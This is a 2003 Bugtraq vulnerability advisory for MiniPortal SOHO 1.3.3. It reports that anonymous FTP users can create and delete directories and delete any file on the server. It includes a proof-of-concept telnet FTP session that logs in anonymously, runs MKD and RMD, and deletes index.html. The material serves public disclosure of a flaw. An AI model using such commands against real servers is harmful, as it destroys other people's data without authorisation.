Bugtraq mailing list archives
MiniPortal
From: subj <r2subj3ct () dwclan org>
Date: 30 Mar 2003 19:15:25 -0000
Product : MiniPortal SOHO Version : 1.3.3 OSystem : Windows Authors : Instant Servers Inc WebSite : http://www.instantservers.com Problem : Create and Remove directories with anonymous access Description: ------------ eng: ==== MiniPortal includes the following components: WEB Server [Apache 1.3.27] FTP Server DNS Server During research of components of the server, the following was revealed: The anonymous user can create and delete directories on the server, And also can delete any files on it. Exploits: ---------
Telnet 127.0.0.1 21
220 FTP Server, ready
USER anonymous
331 Password required
PASS anonymous@localhost
230 User logged in
MKD test
257 "test" created
RMD test
200 Okay
DELE index.html
200 Okay Contacts: --------- r2subj3ct () dwclan org subj.24h.to (www.dwcgr0up.com/subj/) www.dwcgr0up.com irc.dwcgr0up.biz #dwc Thanks: ------- DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
Current thread:
- MiniPortal subj (Apr 01)